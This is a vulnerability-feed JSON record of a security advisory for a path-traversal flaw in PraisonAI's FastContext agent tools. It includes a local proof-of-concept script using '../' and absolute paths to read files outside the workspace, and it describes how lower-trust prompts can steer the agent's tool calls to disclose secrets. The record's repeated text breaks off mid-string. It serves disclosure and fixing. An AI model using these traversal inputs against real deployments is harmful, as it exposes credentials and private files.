{"success":true,"data":{"threats":[{"id":"a9dfaca6-6186-46bf-a1ca-a09760e1d430","slug":"cve-2026-61432","externalId":"GHSA-4xxv-6wmf-xf45","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: FastContext path resolution permits absolute and traversal reads outside the workspace","description":"# FastContext path resolution permits absolute and traversal reads outside the workspace\n\n## Summary\n\nPraisonAI's `praisonaiagents.context.fast` FastContext feature treats `workspace_path` as the root directory for code search, but its model-facing search tools and high-level `read_context()` helper accept absolute paths and `..` traversal paths without checking that the resolved path remains under that workspace. A lower-trust prompt or caller that can influence FastContext tool arguments can read, search, and enumerate files outside the intended project workspace; the resulting file content is then returned to the caller or injected into the model's tool-result context.\n\n## Technical Details\n\n`FastContextAgent` documents `workspace_path` as the \"Root directory for searches\" and stores it as an absolute path:\n\n```python\nclass FastContextAgent:\n    \"\"\"Specialized agent for fast parallel code search.\n\n    Attributes:\n        workspace_path: Root directory for searches\n    \"\"\"\n\n    def __init__(self, workspace_path: str, ...):\n        self.workspace_path = os.path.abspath(workspace_path)\n```\n\nThe same class exposes `grep_search`, `glob_search`, `read_file`, and `list_directory` as model function-call tools via `get_tools()`. Those tools are intended to retrieve code context from the configured workspace.\n\nThe problem is in `FastContextAgent.execute_tool()`. It prepends `workspace_path` only when the caller supplies a relative path, but it does not reject absolute paths and does not canonicalize the joined relative path before enforcing containment:\n\n```python\nif tool_name in (\"grep_search\", \"glob_search\"):\n    if \"search_path\" not in kwargs or kwargs[\"search_path\"] == \".\":\n        kwargs[\"search_path\"] = self.workspace_path\n    elif not os.path.isabs(kwargs[\"search_path\"]):\n        kwargs[\"search_path\"] = os.path.join(self.workspace_path, kwargs[\"search_path\"])\nelif tool_name == \"list_directory\":\n    if \"dir_path\" not in kwargs or kwargs[\"dir_path\"] == \".\":\n        kwargs[\"dir_path\"] = self.workspace_path\n    elif not os.path.isabs(kwargs[\"dir_path\"]):\n        kwargs[\"dir_path\"] = os.path.join(self.workspace_path, kwargs[\"dir_path\"])\nelif tool_name == \"read_file\":\n    if \"filepath\" in kwargs and not os.path.isabs(kwargs[\"filepath\"]):\n        kwargs[\"filepath\"] = os.path.join(self.workspace_path, kwargs[\"filepath\"])\n```\n\nAs a result, an absolute path passes through unchanged, and a relative traversal such as `../outside-secret.txt` is transformed into `<workspace>/../outside-secret.txt`. The downstream search tools then call `os.path.abspath()` and operate on the resolved outside path.\n\nThe downstream tools do not enforce a FastContext workspace boundary:\n\n```python\ndef grep_search(search_path: str, pattern: str, ...):\n    search_path = os.path.abspath(search_path)\n    ...\n    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:\n        lines = f.readlines()\n```\n\n```python\ndef read_file(filepath: str, ...):\n    filepath = os.path.abspath(filepath)\n    ...\n    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:\n        lines = f.readlines()\n```\n\n```python\ndef list_directory(dir_path: str, ...):\n    dir_path = os.path.abspath(dir_path)\n    ...\n    for entry in os.scandir(path):\n        ...\n```\n\nThe model-backed `FastContextAgent.search()` path is also affected. It sends the FastContext tools to the model, parses model-supplied tool-call JSON, and adds those arguments to a `ToolCallBatch`:\n\n```python\nresponse = model_client.chat.completions.create(\n    model=self.model,\n    messages=messages,\n    tools=[{\"type\": \"function\", \"function\": t} for t in self.get_tools()],\n    tool_choice=\"auto\"\n)\n...\nargs = json.loads(tool_call.function.arguments)\nbatch.add(tool_call.function.name, **args)\n...\ntool_results = self.coordinator.execute_turn_sync(batch)\n```\n\nThat path bypasses `execute_tool()`'s incomplete workspace-prefixing entirely and sends model-generated paths directly to the raw filesystem search functions through `ParallelSearchCoordinator`.\n\nThe public high-level API has the same containment gap. `FastContext.read_context()` documents `filepath` as \"relative to workspace\", joins relative paths with `workspace_path`, and then calls `read_file()` without a resolved-path containment check:\n\n```python\ndef read_context(self, filepath: str, ...):\n    full_path = filepath\n    if not os.path.isabs(filepath):\n        full_path = os.path.join(self.workspace_path, filepath)\n\n    result = read_file(full_path, ...)\n```\n\nThis behavior is not required for intended FastContext code search. A normal search through `search_simple()` searches only `self.workspace_path`; the PoV below uses that as the negative control. The vulnerability is that caller/model-controlled path parameters can escape that intended root.\n\n## PoV\n\nThe following local PoV creates a workspace with one harmless file and an adjacent outside file containing a canary. It then proves that ordinary workspace search does not find the canary, while FastContext path arguments can read, grep, glob, list, and return that outside canary through workspace-scoped APIs. The source-to-sink details above show the same missing containment also affects the model-backed `FastContextAgent.search()` path because it dispatches model-generated path arguments to the same raw search functions.\n\n```python\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\nfrom praisonaiagents.context.fast import FastContext\nfrom praisonaiagents.context.fast.fast_context_agent import FastContextAgent\n\nCANARY = \"FAST_CONTEXT_CANARY=outside-workspace\"\n\nwith TemporaryDirectory() as tmp:\n    root = Path(tmp) / \"workspace\"\n    root.mkdir()\n    (root / \"inside.txt\").write_text(\"INSIDE_ONLY=workspace\\n\")\n    outside = Path(tmp) / \"outside-secret.txt\"\n    outside.write_text(CANARY + \"\\n\")\n\n    agent = FastContextAgent(str(root))\n\n    assert len(agent.search_simple(CANARY).files) == 0\n    assert \"INSIDE_ONLY=workspace\" in agent.execute_tool(\"read_file\", filepath=\"inside.txt\")[\"content\"]\n\n    assert CANARY in agent.execute_tool(\"read_file\", filepath=\"../outside-secret.txt\")[\"content\"]\n    assert CANARY in agent.execute_tool(\"read_file\", filepath=str(outside))[\"content\"]\n    assert any(CANARY in match[\"content\"] for match in agent.execute_tool(\"grep_search\", search_path=\"..\", pattern=CANARY))\n    assert any(match[\"path\"] == \"outside-secret.txt\" for match in agent.execute_tool(\"glob_search\", search_path=\"..\", pattern=\"*.txt\"))\n    assert any(entry[\"name\"] == \"outside-secret.txt\" for entry in agent.execute_tool(\"list_directory\", dir_path=\"..\")[\"entries\"])\n\n    fc = FastContext(workspace_path=str(root), cache_enabled=False)\n    assert CANARY in fc.read_context(\"../outside-secret.txt\")\n```\n\n## PoC\n\nSave the self-contained script from the Appendix below as `fastcontext_workspace_pov.py`, then run it against a local checkout:\n\n```bash\nexport PRAISONAI=/path/to/PraisonAI\nPYTHONPATH=\"$PRAISONAI/src/praisonai-agents\" python fastcontext_workspace_pov.py\n```\n\nExpected vulnerable output:\n\n```json\n{\n  \"results\": {\n    \"absolute_read_discloses_canary\": true,\n    \"glob_parent_reveals_outside_file\": true,\n    \"grep_parent_discloses_canary\": true,\n    \"high_level_read_context_discloses_canary\": true,\n    \"inside_read_still_works\": true,\n    \"list_parent_reveals_outside_file\": true,\n    \"relative_traversal_read_discloses_canary\": true,\n    \"simple_search_does_not_find_outside_canary\": true\n  },\n  \"vulnerable\": true\n}\n```\n\nThe version sweep sampled the FastContext introduction boundary and current releases:\n\n```text\nPraisonAI FastContext workspace-boundary version sweep\ncurrent_main: 1620b49f36945d8cc8ee5635b906c960df5097a0\nlatest_tag_context: v4.6.63-2-g1620b49f\n\nv2.3.9 praisonaiagents=0.0.188 missing fast_context_agent.py\nv2.3.10 praisonaiagents=0.0.189 missing fast_context_agent.py\n{\"ref\": \"v2.3.11\", \"praisonaiagents_version\": \"0.0.190\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v3.8.1\", \"praisonaiagents_version\": \"0.11.7\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.5.149\", \"praisonaiagents_version\": \"1.6.8\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.6.58\", \"praisonaiagents_version\": \"1.6.58\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.6.62\", \"praisonaiagents_version\": \"1.6.62\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.6.63\", \"praisonaiagents_version\": \"1.6.63\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"HEAD\", \"praisonaiagents_version\": \"1.6.63\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n```\n\nNo external service, live target, or real credential is needed for reproduction.\n\n## Impact\n\nIf an application exposes FastContext to lower-trust prompts or users, the attacker can cause the PraisonAI process to read files outside the intended workspace and return the contents through tool results or high-level FastContext APIs. Practical impacts include disclosure of source files, logs, prompt transcripts, API keys, local configuration, cloud credentials, and other process-readable text files. `grep_search` can search outside directories for secrets, `glob_search` and `list_directory` can enumerate outside file names and metadata, and `read_file`/`read_context` can return file contents.\n\nThe demonstrated impact is confidentiality. This report does not claim arbitrary write, code execution, or availability impact.\n\nSuggested severity: High for network/API-backed agent deployments where lower-trust prompt content can influence a tool-using FastContext search; Medium if maintainers score only direct local API misuse. A conservative agent-deployment CVSS 3.1 vector is:\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N\n```\n\nRelevant CWEs:\n\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory\n- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n\n## Suggested Fix\n\nMake FastContext path resolution fail closed around a single workspace-containment helper:\n\n1. Resolve the configured workspace once.\n2. For every FastContext path argument, reject absolute paths outside the workspace, join relative paths to the workspace, resolve the candidate, and require `candidate.relative_to(workspace)` to succeed.\n3. Apply this helper in `FastContextAgent.execute_tool()` for `grep_search`, `glob_search`, `read_file`, and `list_directory`.\n4. Apply the same helper before adding model-generated tool calls to `ToolCallBatch` in `FastContextAgent.search()`. Do not call the raw `search_tools` functions with model-supplied paths.\n5. Apply the same helper in `FastContext.read_context()`.\n6. Consider making `search_tools.execute_tool()` accept an optional `workspace_path` and enforce containment when used as a workspace-scoped tool dispatcher.\n7. Add regression tests for absolute outside paths and `..` traversal in all four FastContext tools, high-level `read_context()`, and the model tool-call execution path.\n\nMinimal containment shape:\n\n```python\ndef _resolve_workspace_path(workspace: str, user_path: str) -> str:\n    root = Path(workspace).resolve()\n    candidate = Path(user_path)\n    if not candidate.is_absolute():\n        candidate = root / candidate\n    resolved = candidate.resolve()\n    try:\n        resolved.relative_to(root)\n    except ValueError as exc:\n        raise PermissionError(f\"FastContext path is outside workspace: {user_path}\") from exc\n    return str(resolved)\n```\n\n## Affected Package/Versions\n\n- Package: `praisonaiagents`\n- Component: `praisonaiagents.context.fast`\n- Current main tested: `1620b49f36945d8cc8ee5635b906c960df5097a0`\n- Current package version in the tested source tree: `1.6.63`\n- Sampled introduction boundary: absent in repo tags where `praisonaiagents` is `0.0.188` and `0.0.189`; present and vulnerable starting with sampled `0.0.190`\n- Latest tested release tag: `v4.6.63`, `praisonaiagents` version `1.6.63`\n\nSuggested affected range, based on the sampled source sweep:\n\n```text\npraisonaiagents >= 0.0.190, <= 1.6.63\n```\n\nThe exact first released package version should be confirmed by maintainers from the `praisonaiagents.context.fast` release history, but the repository sweep shows the vulnerable FastContext files first present at the sampled `praisonaiagents 0.0.190` point and still vulnerable on current main.\n\n## Advisory History\n\nNo checked public advisory or local prior report matched the FastContext code-search workspace-boundary bypass in `praisonaiagents.context.fast`.\n\nClosest public comparators are related but distinct:\n\n- `GHSA-gcq3-mfvh-3x25`: PraisonAI Code agent tools fail open without a workspace boundary. That advisory covers `praisonai` Code `CODE_TOOLS` wrappers and unset workspace defaults for read/edit helpers. This report covers `praisonaiagents.context.fast.FastContextAgent` and `FastContext` with an explicitly configured `workspace_path`; the root cause is missing containment after path joining and raw model tool-call dispatch, not an unset global workspace.\n- `GHSA-j7qx-p75m-wp7g`: PraisonAI dynamic-context artifact tools read arbitrary host files outside artifact storage. That advisory covers Dynamic Context artifact tools that accept raw `artifact_path` values. This report covers FastContext code-search/read/list tools and the model-backed FastContext search loop.\n- `GHSA-22cj-m4wf-fv2c`: PraisonAI Dynamic Context history and terminal tools read files outside configured storage via path traversal. That advisory covers Dynamic Context history/terminal stores where `run_id` and `agent_id` are path components. This report covers FastContext's workspace root and file/search path tool arguments.\n- `GHSA-grrg-5cg9-58pf` / `CVE-2026-40117`: `read_skill_file()` arbitrary file read due missing workspace boundary and approval gate. This report does not use skill tools.\n- `GHSA-7j2f-xc8p-fjmq` / `CVE-2026-40152`: legacy `FileTools.list_files()` glob traversal. This report affects FastContext and can disclose file content through `read_file`/`grep_search`, not only metadata through FileTools glob patterns.\n- `GHSA-693f-pf34-72c5`: FileTools path traversal. This report is in `praisonaiagents.context.fast`, not `praisonaiagents.tools.file_tools`.\n- `GHSA-9cr9-25q5-8prj` and `GHSA-9mqq-jqxf-grvw`: MCP file/path traversal surfaces. This report does not use MCP.\n\nPublic issue/PR search found no hits for `FastContext arbitrary file read`, `\"Fast Context\" workspace boundary`, or `fast_context_agent` in `MervinPraison/PraisonAI`.\n\n## References\n\n- PraisonAI Fast Context docs: https://docs.praison.ai/docs/features/fast-context\n- PraisonAI tools docs, Fast Context section: https://docs.praison.ai/docs/concepts/tools\n- PraisonAI repository advisories: https://github.com/MervinPraison/PraisonAI/security/advisories\n- `GHSA-gcq3-mfvh-3x25`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gcq3-mfvh-3x25\n- `GHSA-j7qx-p75m-wp7g`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-j7qx-p75m-wp7g\n- `GHSA-22cj-m4wf-fv2c`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-22cj-m4wf-fv2c\n- `GHSA-grrg-5cg9-58pf`: https://github.com/advisories/GHSA-grrg-5cg9-58pf\n- `GHSA-7j2f-xc8p-fjmq`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq\n- CWE-22: https://cwe.mitre.org/data/definitions/22.html\n- CWE-200: https://cwe.mitre.org/data/definitions/200.html\n\n## Appendix: Self-Contained FastContext Workspace PoC\n\n```python\n#!/usr/bin/env python3\nimport json\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\n\nfrom praisonaiagents.context.fast import FastContext\nfrom praisonaiagents.context.fast.fast_context_agent import FastContextAgent\n\n\nCANARY = \"FAST_CONTEXT_CANARY=outside-workspace\"\n\n\ndef main() -> None:\n    with TemporaryDirectory(prefix=\"fastcontext-workspace-pov-\") as tmp:\n        temp_root = Path(tmp)\n        workspace = temp_root / \"workspace\"\n        workspace.mkdir()\n        inside = workspace / \"inside.txt\"\n        outside = temp_root / \"outside-secret.txt\"\n\n        inside.write_text(\"INSIDE_ONLY=workspace\\n\", encoding=\"utf-8\")\n        outside.write_text(CANARY + \"\\n\", encoding=\"utf-8\")\n\n        agent = FastContextAgent(str(workspace), max_turns=2, max_parallel=4)\n        simple_result = agent.search_simple(CANARY)\n        inside_result = agent.execute_tool(\"read_file\", filepath=\"inside.txt\")\n        relative_read = agent.execute_tool(\"read_file\", filepath=\"../outside-secret.txt\")\n        absolute_read = agent.execute_tool(\"read_file\", filepath=str(outside))\n        grep_parent = agent.execute_tool(\"grep_search\", search_path=\"..\", pattern=CANARY, max_results=5)\n        glob_parent = agent.execute_tool(\"glob_search\", search_path=\"..\", pattern=\"*.txt\", max_results=5)\n        list_parent = agent.execute_tool(\"list_directory\", dir_path=\"..\", max_entries=10)\n\n        context = FastContext(workspace_path=str(workspace), cache_enabled=False)\n        context_read = context.read_context(\"../outside-secret.txt\")\n\n        results = {\n            \"simple_search_does_not_find_outside_canary\": len(simple_result.files) == 0,\n            \"inside_read_still_works\": \"INSIDE_ONLY=workspace\" in inside_result.get(\"content\", \"\"),\n            \"relative_traversal_read_discloses_canary\": CANARY in relative_read.get(\"content\", \"\"),\n            \"absolute_read_discloses_canary\": CANARY in absolute_read.get(\"content\", \"\"),\n            \"grep_parent_discloses_canary\": any(CANARY in match.get(\"content\", \"\") for match in grep_parent),\n            \"glob_parent_reveals_outside_file\": any(match.get(\"path\") == \"outside-secret.txt\" for match in glob_parent),\n            \"list_parent_reveals_outside_file\": any(entry.get(\"name\") == \"outside-secret.txt\" for entry in list_parent.get(\"entries\", [])),\n            \"high_level_read_context_discloses_canary\": CANARY in (context_read or \"\"),\n        }\n\n        print(json.dumps({\"vulnerable\": all(results.values()), \"results\": results}, indent=2, sort_keys=True))\n\n\nif __name__ == \"__main__\":\n    main()\n```","cveId":"CVE-2026-61432","cvssScore":null,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N","severity":"medium","vendor":"PyPI","product":"praisonaiagents","affectedVersions":["pkg:pypi/praisonaiagents < 1.6.78"],"cwes":["CWE-200","CWE-22"],"tags":["osv","osv:ghsa-4xxv-6wmf-xf45","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-4xxv-6wmf-xf45","type":"advisory","title":"OSV GHSA-4xxv-6wmf-xf45"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4xxv-6wmf-xf45","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61432","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/1620b49f36945d8cc8ee5635b906c960df5097a0","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-fastcontext-before-path-traversal","type":"other","title":"OSV web"}],"epssScore":0.00407,"epssPercentile":0.32849,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T16:48:52.000Z","addedAt":"2026-10-08T18:42:42.651Z","updatedAt":"2026-10-08T18:42:42.651Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61432","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61432","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-4xxv-6wmf-xf45"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-4xxv-6wmf-xf45"}],"raw":{"id":"GHSA-4xxv-6wmf-xf45","aliases":["CVE-2026-61432"],"details":"# FastContext path resolution permits absolute and traversal reads outside the workspace\n\n## Summary\n\nPraisonAI's `praisonaiagents.context.fast` FastContext feature treats `workspace_path` as the root directory for code search, but its model-facing search tools and high-level `read_context()` helper accept absolute paths and `..` traversal paths without checking that the resolved path remains under that workspace. A lower-trust prompt or caller that can influence FastContext tool arguments can read, search, and enumerate files outside the intended project workspace; the resulting file content is then returned to the caller or injected into the model's tool-result context.\n\n## Technical Details\n\n`FastContextAgent` documents `workspace_path` as the \"Root directory for searches\" and stores it as an absolute path:\n\n```python\nclass FastContextAgent:\n    \"\"\"Specialized agent for fast parallel code search.\n\n    Attributes:\n        workspace_path: Root directory for searches\n    \"\"\"\n\n    def __init__(self, workspace_path: str, ...):\n        self.workspace_path = os.path.abspath(workspace_path)\n```\n\nThe same class exposes `grep_search`, `glob_search`, `read_file`, and `list_directory` as model function-call tools via `get_tools()`. Those tools are intended to retrieve code context from the configured workspace.\n\nThe problem is in `FastContextAgent.execute_tool()`. It prepends `workspace_path` only when the caller supplies a relative path, but it does not reject absolute paths and does not canonicalize the joined relative path before enforcing containment:\n\n```python\nif tool_name in (\"grep_search\", \"glob_search\"):\n    if \"search_path\" not in kwargs or kwargs[\"search_path\"] == \".\":\n        kwargs[\"search_path\"] = self.workspace_path\n    elif not os.path.isabs(kwargs[\"search_path\"]):\n        kwargs[\"search_path\"] = os.path.join(self.workspace_path, kwargs[\"search_path\"])\nelif tool_name == \"list_directory\":\n    if \"dir_path\" not in kwargs or kwargs[\"dir_path\"] == \".\":\n        kwargs[\"dir_path\"] = self.workspace_path\n    elif not os.path.isabs(kwargs[\"dir_path\"]):\n        kwargs[\"dir_path\"] = os.path.join(self.workspace_path, kwargs[\"dir_path\"])\nelif tool_name == \"read_file\":\n    if \"filepath\" in kwargs and not os.path.isabs(kwargs[\"filepath\"]):\n        kwargs[\"filepath\"] = os.path.join(self.workspace_path, kwargs[\"filepath\"])\n```\n\nAs a result, an absolute path passes through unchanged, and a relative traversal such as `../outside-secret.txt` is transformed into `<workspace>/../outside-secret.txt`. The downstream search tools then call `os.path.abspath()` and operate on the resolved outside path.\n\nThe downstream tools do not enforce a FastContext workspace boundary:\n\n```python\ndef grep_search(search_path: str, pattern: str, ...):\n    search_path = os.path.abspath(search_path)\n    ...\n    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:\n        lines = f.readlines()\n```\n\n```python\ndef read_file(filepath: str, ...):\n    filepath = os.path.abspath(filepath)\n    ...\n    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:\n        lines = f.readlines()\n```\n\n```python\ndef list_directory(dir_path: str, ...):\n    dir_path = os.path.abspath(dir_path)\n    ...\n    for entry in os.scandir(path):\n        ...\n```\n\nThe model-backed `FastContextAgent.search()` path is also affected. It sends the FastContext tools to the model, parses model-supplied tool-call JSON, and adds those arguments to a `ToolCallBatch`:\n\n```python\nresponse = model_client.chat.completions.create(\n    model=self.model,\n    messages=messages,\n    tools=[{\"type\": \"function\", \"function\": t} for t in self.get_tools()],\n    tool_choice=\"auto\"\n)\n...\nargs = json.loads(tool_call.function.arguments)\nbatch.add(tool_call.function.name, **args)\n...\ntool_results = self.coordinator.execute_turn_sync(batch)\n```\n\nThat path bypasses `execute_tool()`'s incomplete workspace-prefixing entirely and sends model-generated paths directly to the raw filesystem search functions through `ParallelSearchCoordinator`.\n\nThe public high-level API has the same containment gap. `FastContext.read_context()` documents `filepath` as \"relative to workspace\", joins relative paths with `workspace_path`, and then calls `read_file()` without a resolved-path containment check:\n\n```python\ndef read_context(self, filepath: str, ...):\n    full_path = filepath\n    if not os.path.isabs(filepath):\n        full_path = os.path.join(self.workspace_path, filepath)\n\n    result = read_file(full_path, ...)\n```\n\nThis behavior is not required for intended FastContext code search. A normal search through `search_simple()` searches only `self.workspace_path`; the PoV below uses that as the negative control. The vulnerability is that caller/model-controlled path parameters can escape that intended root.\n\n## PoV\n\nThe following local PoV creates a workspace with one harmless file and an adjacent outside file containing a canary. It then proves that ordinary workspace search does not find the canary, while FastContext path arguments can read, grep, glob, list, and return that outside canary through workspace-scoped APIs. The source-to-sink details above show the same missing containment also affects the model-backed `FastContextAgent.search()` path because it dispatches model-generated path arguments to the same raw search functions.\n\n```python\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\nfrom praisonaiagents.context.fast import FastContext\nfrom praisonaiagents.context.fast.fast_context_agent import FastContextAgent\n\nCANARY = \"FAST_CONTEXT_CANARY=outside-workspace\"\n\nwith TemporaryDirectory() as tmp:\n    root = Path(tmp) / \"workspace\"\n    root.mkdir()\n    (root / \"inside.txt\").write_text(\"INSIDE_ONLY=workspace\\n\")\n    outside = Path(tmp) / \"outside-secret.txt\"\n    outside.write_text(CANARY + \"\\n\")\n\n    agent = FastContextAgent(str(root))\n\n    assert len(agent.search_simple(CANARY).files) == 0\n    assert \"INSIDE_ONLY=workspace\" in agent.execute_tool(\"read_file\", filepath=\"inside.txt\")[\"content\"]\n\n    assert CANARY in agent.execute_tool(\"read_file\", filepath=\"../outside-secret.txt\")[\"content\"]\n    assert CANARY in agent.execute_tool(\"read_file\", filepath=str(outside))[\"content\"]\n    assert any(CANARY in match[\"content\"] for match in agent.execute_tool(\"grep_search\", search_path=\"..\", pattern=CANARY))\n    assert any(match[\"path\"] == \"outside-secret.txt\" for match in agent.execute_tool(\"glob_search\", search_path=\"..\", pattern=\"*.txt\"))\n    assert any(entry[\"name\"] == \"outside-secret.txt\" for entry in agent.execute_tool(\"list_directory\", dir_path=\"..\")[\"entries\"])\n\n    fc = FastContext(workspace_path=str(root), cache_enabled=False)\n    assert CANARY in fc.read_context(\"../outside-secret.txt\")\n```\n\n## PoC\n\nSave the self-contained script from the Appendix below as `fastcontext_workspace_pov.py`, then run it against a local checkout:\n\n```bash\nexport PRAISONAI=/path/to/PraisonAI\nPYTHONPATH=\"$PRAISONAI/src/praisonai-agents\" python fastcontext_workspace_pov.py\n```\n\nExpected vulnerable output:\n\n```json\n{\n  \"results\": {\n    \"absolute_read_discloses_canary\": true,\n    \"glob_parent_reveals_outside_file\": true,\n    \"grep_parent_discloses_canary\": true,\n    \"high_level_read_context_discloses_canary\": true,\n    \"inside_read_still_works\": true,\n    \"list_parent_reveals_outside_file\": true,\n    \"relative_traversal_read_discloses_canary\": true,\n    \"simple_search_does_not_find_outside_canary\": true\n  },\n  \"vulnerable\": true\n}\n```\n\nThe version sweep sampled the FastContext introduction boundary and current releases:\n\n```text\nPraisonAI FastContext workspace-boundary version sweep\ncurrent_main: 1620b49f36945d8cc8ee5635b906c960df5097a0\nlatest_tag_context: v4.6.63-2-g1620b49f\n\nv2.3.9 praisonaiagents=0.0.188 missing fast_context_agent.py\nv2.3.10 praisonaiagents=0.0.189 missing fast_context_agent.py\n{\"ref\": \"v2.3.11\", \"praisonaiagents_version\": \"0.0.190\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v3.8.1\", \"praisonaiagents_version\": \"0.11.7\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.5.149\", \"praisonaiagents_version\": \"1.6.8\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.6.58\", \"praisonaiagents_version\": \"1.6.58\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.6.62\", \"praisonaiagents_version\": \"1.6.62\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"v4.6.63\", \"praisonaiagents_version\": \"1.6.63\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n{\"ref\": \"HEAD\", \"praisonaiagents_version\": \"1.6.63\", \"status\": \"vulnerable\", \"relative_traversal_read\": true, \"absolute_read\": true, \"grep_parent_read\": true, \"fast_context_read_context_traversal\": true}\n```\n\nNo external service, live target, or real credential is needed for reproduction.\n\n## Impact\n\nIf an application exposes FastContext to lower-trust prompts or users, the attacker can cause the PraisonAI process to read files outside the intended workspace and return the contents through tool results or high-level FastContext APIs. Practical impacts include disclosure of source files, logs, prompt transcripts, API keys, local configuration, cloud credentials, and other process-readable text files. `grep_search` can search outside directories for secrets, `glob_search` and `list_directory` can enumerate outside file names and metadata, and `read_file`/`read_context` can return file contents.\n\nThe demonstrated impact is confidentiality. This report does not claim arbitrary write, code execution, or availability impact.\n\nSuggested severity: High for network/API-backed agent deployments where lower-trust prompt content can influence a tool-using FastContext search; Medium if maintainers score only direct local API misuse. A conservative agent-deployment CVSS 3.1 vector is:\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N\n```\n\nRelevant CWEs:\n\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory\n- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n\n## Suggested Fix\n\nMake FastContext path resolution fail closed around a single workspace-containment helper:\n\n1. Resolve the configured workspace once.\n2. For every FastContext path argument, reject absolute paths outside the workspace, join relative paths to the workspace, resolve the candidate, and require `candidate.relative_to(workspace)` to succeed.\n3. Apply this helper in `FastContextAgent.execute_tool()` for `grep_search`, `glob_search`, `read_file`, and `list_directory`.\n4. Apply the same helper before adding model-generated tool calls to `ToolCallBatch` in `FastContextAgent.search()`. Do not call the raw `search_tools` functions with model-supplied paths.\n5. Apply the same helper in `FastContext.read_context()`.\n6. Consider making `search_tools.execute_tool()` accept an optional `workspace_path` and enforce containment when used as a workspace-scoped tool dispatcher.\n7. Add regression tests for absolute outside paths and `..` traversal in all four FastContext tools, high-level `read_context()`, and the model tool-call execution path.\n\nMinimal containment shape:\n\n```python\ndef _resolve_workspace_path(workspace: str, user_path: str) -> str:\n    root = Path(workspace).resolve()\n    candidate = Path(user_path)\n    if not candidate.is_absolute():\n        candidate = root / candidate\n    resolved = candidate.resolve()\n    try:\n        resolved.relative_to(root)\n    except ValueError as exc:\n        raise PermissionError(f\"FastContext path is outside workspace: {user_path}\") from exc\n    return str(resolved)\n```\n\n## Affected Package/Versions\n\n- Package: `praisonaiagents`\n- Component: `praisonaiagents.context.fast`\n- Current main tested: `1620b49f36945d8cc8ee5635b906c960df5097a0`\n- Current package version in the tested source tree: `1.6.63`\n- Sampled introduction boundary: absent in repo tags where `praisonaiagents` is `0.0.188` and `0.0.189`; present and vulnerable starting with sampled `0.0.190`\n- Latest tested release tag: `v4.6.63`, `praisonaiagents` version `1.6.63`\n\nSuggested affected range, based on the sampled source sweep:\n\n```text\npraisonaiagents >= 